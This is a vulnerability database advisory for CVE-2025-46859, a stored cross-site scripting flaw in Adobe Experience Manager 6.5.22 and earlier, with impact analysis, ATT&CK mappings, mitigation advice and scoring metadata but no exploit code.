CVE-2025-46859 in Experience Managerinfo

Summary

by MITRE • 06/11/2025

Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

Once again VulDB remains the best source for vulnerability data.

Analysis

by VulDB Data Team • 06/11/2025

Adobe Experience Manager versions 6.5.22 and earlier contain a stored cross-site scripting vulnerability that represents a significant security risk for organizations relying on this content management platform. This vulnerability falls under the CWE-79 category of Cross-Site Scripting, specifically classified as a stored XSS flaw where malicious input is permanently stored on the server and subsequently served to other users. The vulnerability manifests when low-privileged attackers exploit form fields within the AEM interface to inject malicious JavaScript payloads that persist in the system and execute in the context of other users who view the affected content. The attack vector leverages the platform's insufficient input validation and output encoding mechanisms, allowing attackers to bypass security controls that should prevent malicious code execution within the browser environment.

The operational impact of this vulnerability extends beyond simple script execution as it provides attackers with the ability to perform session hijacking, steal sensitive user credentials, and potentially escalate privileges within the AEM environment. When victims browse to pages containing the maliciously injected content, their browsers execute the injected JavaScript code, which can capture session cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users. This vulnerability particularly affects organizations using AEM for collaborative content creation and management, where form fields are commonly used for data entry and user interaction. The low privilege requirement for exploitation means that even users with minimal access rights can potentially compromise the entire system, making this a critical concern for enterprise security teams.

From an ATT&CK framework perspective, this vulnerability maps to multiple techniques including T1566.001 for credential access through social engineering and T1059.007 for command and scripting interpreter. The vulnerability enables adversaries to establish persistent access through session manipulation and can facilitate further exploitation attempts. Organizations should implement comprehensive input sanitization measures, including the enforcement of strict content validation rules and output encoding for all user-supplied data. Security controls should include regular security assessments of form handling mechanisms, implementation of web application firewalls, and enforcement of proper access controls to limit the potential impact of such vulnerabilities. Additionally, organizations should conduct regular security training for administrators and users to recognize potential social engineering attempts that might leverage this vulnerability. The remediation approach should prioritize immediate patching of affected AEM versions, with temporary mitigations including enhanced monitoring of form field submissions and implementation of additional input validation layers to prevent exploitation attempts.

Responsible

Adobe

Reservation

04/30/2025

Disclosure

06/11/2025

Moderation

accepted

CPE

ready

EPSS

0.00259

KEV

no

Activities

very low

Sources

Interested in the pricing of exploits?

See the underground prices here!